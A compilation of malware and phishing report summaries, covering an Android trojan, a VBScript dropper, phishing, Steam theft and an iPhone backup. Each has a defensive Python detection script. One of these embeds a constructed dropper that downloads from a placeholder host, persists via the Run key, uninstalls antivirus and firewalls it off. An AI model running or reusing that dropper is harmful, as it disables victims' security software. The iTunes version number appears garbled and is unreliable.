The analyzed sample is a trojan that poses as a Solitaire game while carrying out other activities in the background without the user's consent, such as exploiting vulnerabilities and installing additional applications or unwanted advertisements (adware). The trojan belongs to the DroidKungFu malware family, first detected in 2011 in applications distributed in China. DroidKungFu variants have two notable characteristics: they carry privilege-escalation exploits (known as RageAgainstTheCage and Exploid), and those exploits are stored AES-encrypted inside the application. Its main actions are collecting information about the device and sending it to remote servers, exploiting vulnerabilities to root the device, installing other applications and receiving instructions from its C&C (this last function could not be studied because the domains were down).
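One thing an analyst wants when a sample is said to carry AES-encrypted exploits is a quick way to find them among the APK assets before touching the decryption routine. The following triage script is an added example and is not code from the original report or from the DroidKungFu sample: it walks the `assets/` directory of an APK (which is a ZIP file), computes the Shannon entropy of each entry and flags blobs that have no known file signature, high entropy and a length that is a multiple of the 16-byte AES block. The APK it scans is constructed in memory; the asset names, the entropy threshold and the list of known magic bytes are assumptions for the example.

```python
import hashlib
import io
import math
import zipfile
from collections import Counter

AES_BLOCK = 16
ENTROPY_THRESHOLD = 7.5  # bits per byte; encrypted or compressed data sits close to 8.0 (assumed cut-off)
# Signatures of plaintext formats that legitimately look random but are not encrypted (assumed list)
KNOWN_MAGIC = (b"\x7fELF", b"PK\x03\x04", b"dex\n", b"\x89PNG", b"\xff\xd8\xff", b"GIF8")


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; 0.0 for empty input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(data: bytes) -> bool:
    """Heuristic for an AES-encrypted blob: no known signature, block-aligned length, high entropy.
    Padded CBC/ECB ciphertext is always a multiple of 16 bytes; stream modes would evade this check."""
    if data.startswith(KNOWN_MAGIC):
        return False
    return len(data) % AES_BLOCK == 0 and shannon_entropy(data) >= ENTROPY_THRESHOLD


def triage_apk(apk_bytes: bytes, prefix: str = "assets/") -> dict:
    """Return {entry_name: (size, entropy, suspicious)} for every file under `prefix` in the APK."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        for info in apk.infolist():
            if info.is_dir() or not info.filename.startswith(prefix):
                continue
            data = apk.read(info)
            report[info.filename] = (len(data), round(shannon_entropy(data), 3), looks_encrypted(data))
    return report


def _pseudo_random(seed: bytes, length: int) -> bytes:
    """Deterministic high-entropy bytes (SHA-256 chain) standing in for ciphertext in the sample."""
    out, block = bytearray(), seed
    while len(out) < length:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:length])


def build_sample_apk() -> bytes:
    """Constructed stand-in for an APK (not the real sample): a text asset, a plaintext ELF-like
    binary, and a 4096-byte high-entropy blob playing the role of an AES-encrypted exploit."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as apk:
        apk.writestr("AndroidManifest.xml", b"<manifest/>")
        apk.writestr("assets/readme.txt", b"Solitaire game assets\n" * 40)
        apk.writestr("assets/plain_binary", b"\x7fELF" + b"\x00" * 4092)
        apk.writestr("assets/exploit.enc", _pseudo_random(b"constructed-sample", 4096))
    return buf.getvalue()


if __name__ == "__main__":
    for name, (size, entropy, suspicious) in triage_apk(build_sample_apk()).items():
        print(f"{name:24} {size:6d} bytes  H={entropy:.3f}  {'ENCRYPTED?' if suspicious else ''}")
```

Entries flagged this way are the ones worth tracing backwards from the code that reads them, since the AES key or key-derivation logic has to live in the DEX for the trojan to use the exploit at runtime.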
Out of all the samples received during the last few weeks, the Visual Basic scripts (.vbs or .vbe) are the ones that caught our attention. In this report, we analyze a Visual Basic script that was encoded with a legitimate Windows tool to hinder its analysis. The analyzed sample is the first infection stage: its purpose is to download, and in some cases ensure the persistence of, additional modules or updates of the trojan; it also uninstalls the security software installed on the computer (such as antivirus products or banking plugins) and creates firewall rules to block the network traffic of those executables in case the uninstall fails.
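The behaviours listed above (download, persistence, uninstalling security software, firewall rules blocking its executables) are the ones to look for once the script has been decoded to plain VBScript. The scanner below is an added example, not code or indicators from the original report: it runs a small set of regular expressions over a script line by line, reports which behaviour each line matches, and flags the download-plus-tampering profile the report describes. The regex list and the sample script are constructed for this example and are assumptions; an encoded `.vbe` file (recognisable by its `#@~^` header) is only reported as encoded, since the patterns need the decoded text.

```python
import re
from collections import defaultdict

# Indicator regexes keyed by behaviour (constructed for this example; extend from your own samples)
INDICATORS = {
    "encoded-script": re.compile(r"#@~\^"),  # header of a .vbe file: decode before scanning
    "download": re.compile(r"MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest|ADODB\.Stream", re.I),
    "execute": re.compile(r"\.(Run|Exec|ShellExecute)\b", re.I),
    "persistence": re.compile(r"CurrentVersion\\Run|\\Startup\\|schtasks", re.I),
    "uninstall-security": re.compile(r"Win32_Product|\.Uninstall\b|msiexec\s+/x", re.I),
    "firewall-block": re.compile(r"netsh\s+(advfirewall\s+)?firewall\s+add|action=block", re.I),
}


def scan_script(text: str) -> dict:
    """Return {behaviour: [line numbers]} for every indicator that matches in the script."""
    hits = defaultdict(list)
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits[name].append(lineno)
    return dict(hits)


def summarize(hits: dict):
    """Sorted behaviour list plus whether the script matches the stage-one profile:
    downloads something and also tampers with security software or the firewall."""
    tampering = "uninstall-security" in hits or "firewall-block" in hits
    return sorted(hits), ("download" in hits and tampering)


# Constructed sample script (not the analysed sample): downloads a module, persists it,
# uninstalls an antivirus via WMI and blocks its executable with a firewall rule.
SAMPLE = r'''
Set sh = CreateObject("WScript.Shell")
Set http = CreateObject("MSXML2.XMLHTTP")
http.Open "GET", "http://example.invalid/mod1.bin", False
http.Send
Set st = CreateObject("ADODB.Stream")
st.Open : st.Type = 1 : st.Write http.responseBody
st.SaveToFile "C:\ProgramData\mod1.exe", 2
sh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\mod1", "C:\ProgramData\mod1.exe"
Set wmi = GetObject("winmgmts:\\.\root\cimv2")
For Each p In wmi.ExecQuery("Select * From Win32_Product Where Name Like '%Antivirus%'")
    p.Uninstall()
Next
sh.Run "netsh advfirewall firewall add rule name=""av"" dir=out action=block program=""C:\Program Files\AV\av.exe""", 0, True
'''

if __name__ == "__main__":
    found = scan_script(SAMPLE)
    for behaviour, lines in sorted(found.items()):
        print(f"{behaviour:20} lines {lines}")
    print("stage-one dropper profile:", summarize(found)[1])
```

Line-level hits matter more than the verdict: the firewall rule gives you the path of the security product the sample targets, and the download line gives you the URL of the next stage to pull for analysis.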
As mentioned in the first phishing and malware statistics report, it is important to present the most common cases in order to alert users and reduce the number of people affected.
During this quarter, some of the most interesting phishing campaigns were related to the Mexican Tax Administration Service (Servicio de Administración Tributaria, SAT) and to .cab files sent as attachments. There was also an increase in the number of fake Banamex emails and the appearance of fake emails impersonating Banorte, Netflix, WhatsApp and CFE (the Federal Electricity Commission in Mexico), which had not been observed in the first statistics report. Another notable characteristic is that phishing campaigns have started to include two links, one for individual users and one for businesses, each redirecting to a different phishing site. As for malware, the most common type is the malicious Word document.
During the last few months, users of the popular video game distribution platform Steam have been targeted by several fake login websites and by chat messages containing links that redirect to malware downloads which, once executed, steal the file that allows an attacker to access the account without knowing the login credentials.
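Both delivery routes described above start with a link: a login page on a lookalike domain, or a chat message pointing at an executable. The classifier below is an added example, not code from the original report, and it is a generalisation of the two cases: it takes a URL and returns a reason when the host is a typo-squat or homoglyph of a legitimate Steam domain, places the brand name on a foreign domain, uses punycode, or links straight to an executable. The set of legitimate domains, the executable extensions, the edit-distance cut-off and the test URLs are assumptions for the example, and the registrable-domain logic is simplified to the last two labels (a real tool would use the Public Suffix List).

```python
import unicodedata
from urllib.parse import urlparse

# Assumed allow-list of legitimate registrable domains (not from the original report)
LEGIT_DOMAINS = {"steamcommunity.com", "steampowered.com"}
BRAND = "steam"
EXEC_EXT = (".exe", ".scr", ".bat", ".cmd", ".js", ".vbs", ".msi")  # assumed list
MAX_EDITS = 2  # assumed: hosts within two edits of a legit domain count as lookalikes


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def fold_homoglyphs(host: str) -> str:
    """Decompose accented characters and drop the combining marks, so 'sťeam' folds to 'steam'.
    ASCII hosts are returned unchanged."""
    decomposed = unicodedata.normalize("NFKD", host)
    return "".join(c for c in decomposed if not unicodedata.combining(c))


def registrable(host: str) -> str:
    """Simplification: the last two labels of the host name."""
    return ".".join(host.split(".")[-2:])


def classify_link(url: str):
    """Return None for a benign-looking link, otherwise a short reason string."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower().rstrip(".")
    if not host:
        return "no host"
    if parsed.path.lower().endswith(EXEC_EXT):
        return "link to executable"  # the chat-message case: a direct malware download
    if any(label.startswith("xn--") for label in host.split(".")):
        return "punycode host"
    reg = registrable(host)
    if reg in LEGIT_DOMAINS:
        return None
    folded = fold_homoglyphs(host)
    if folded != host and registrable(folded) in LEGIT_DOMAINS:
        return "homoglyph of " + registrable(folded)
    if BRAND in host:
        closest = min(LEGIT_DOMAINS, key=lambda d: levenshtein(reg, d))
        if levenshtein(reg, closest) <= MAX_EDITS:
            return "lookalike of " + closest  # typo-squat such as a swapped or dropped letter
        return "brand name on foreign domain"  # e.g. steamcommunity.com.evil.example
    return None


if __name__ == "__main__":
    # Constructed URLs for illustration; none of them are from the original report
    for link in ("https://steamcommunity.com/id/example",
                 "https://steamcommunlty.com/login",
                 "http://steamcommunity.com.example.invalid/login",
                 "http://files.example.invalid/screenshot.scr",
                 "https://sťeamcommunity.com/login"):
        print(f"{link:50} -> {classify_link(link)}")
```

The order of the checks matters: the executable test runs first because a legitimate-looking host can still hand out a `.scr`, and the exact allow-list match runs before any fuzzy comparison so that the real domains are never reported as lookalikes of themselves.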
Malicious programs can reach our devices in many ways; one of them is through the backup files of our mobile devices. Even though such files do not pose a direct threat because of where and how they are stored, it is important to understand why and how this happens. In this report, we analyze a backup file of an iPhone 4S running iOS 8.2 that was detected as a threat by Microsoft Security Essentials. The version of iTunes used to create the backup was 184.108.40.206. The file detected was a malicious Word document that had been sent to the user by email.
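Why an antivirus on the computer sees the document at all: iTunes writes every file from the device into the backup directory under a hashed name, but with its content intact, so a Word document received on the phone is still a Word document on disk. The script below is an added example, not code from the original report: it computes the name a file gets in the flat, pre-iOS 10 backup layout (SHA-1 of `<domain>-<relative path>`), and scans a backup directory for files that are Office documents by their content regardless of their hashed name. The backup it scans is constructed in a temporary directory; the mail and document paths used for the constructed entries are assumptions, and only the `HomeDomain-Library/SMS/sms.db` name is a real, well-known value. From iOS 10 onwards the files live in two-character subdirectories, so the walk would need adjusting for newer backups.

```python
import hashlib
import io
import os
import tempfile
import zipfile

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy .doc/.xls/.ppt compound file header
ZIP_MAGIC = b"PK\x03\x04"                          # OOXML (.docx/.xlsx) is a ZIP container


def backup_filename(domain: str, relative_path: str) -> str:
    """Name under which iTunes stores a device file in a pre-iOS 10 backup:
    hex SHA-1 of '<domain>-<relative path>'."""
    return hashlib.sha1(f"{domain}-{relative_path}".encode()).hexdigest()


def classify_file(path: str):
    """Identify Office documents by content; None for anything else."""
    with open(path, "rb") as fh:
        head = fh.read(8)
    if head == OLE2_MAGIC:
        return "ole2-office"
    if head.startswith(ZIP_MAGIC):
        try:
            with zipfile.ZipFile(path) as zf:
                names = set(zf.namelist())
        except zipfile.BadZipFile:
            return None
        if "word/document.xml" in names:
            return "ooxml-word"
        if any(n.startswith("xl/") for n in names):
            return "ooxml-excel"
        return "zip"
    return None


def scan_backup(backup_dir: str) -> dict:
    """Return {hashed_name: kind} for every file in a flat backup directory that is an
    Office document, i.e. what an on-access scanner would stop on."""
    found = {}
    for name in sorted(os.listdir(backup_dir)):
        path = os.path.join(backup_dir, name)
        if os.path.isfile(path):
            kind = classify_file(path)
            if kind:
                found[name] = kind
    return found


def build_sample_backup() -> str:
    """Constructed backup directory (not the analysed one): a fake sms.db, a minimal .docx
    stored under an assumed mail-attachment path, and a legacy .doc header."""
    d = tempfile.mkdtemp(prefix="ios-backup-")
    with open(os.path.join(d, backup_filename("HomeDomain", "Library/SMS/sms.db")), "wb") as fh:
        fh.write(b"SQLite format 3\x00" + b"\x00" * 100)
    docx = io.BytesIO()
    with zipfile.ZipFile(docx, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
    with open(os.path.join(d, backup_filename("HomeDomain", "Library/Mail/attachment.docx")), "wb") as fh:
        fh.write(docx.getvalue())
    with open(os.path.join(d, backup_filename("MediaDomain", "Documents/invoice.doc")), "wb") as fh:
        fh.write(OLE2_MAGIC + b"\x00" * 504)
    return d


if __name__ == "__main__":
    backup = build_sample_backup()
    for hashed, kind in scan_backup(backup).items():
        print(f"{hashed}  {kind}")
```

Because the stored name is a hash of the domain and path, the same attachment lands under the same name on every backup of that device, which is why excluding a single flagged file from the scanner does nothing useful: the document has to be removed on the phone or the backup has to be rebuilt without it.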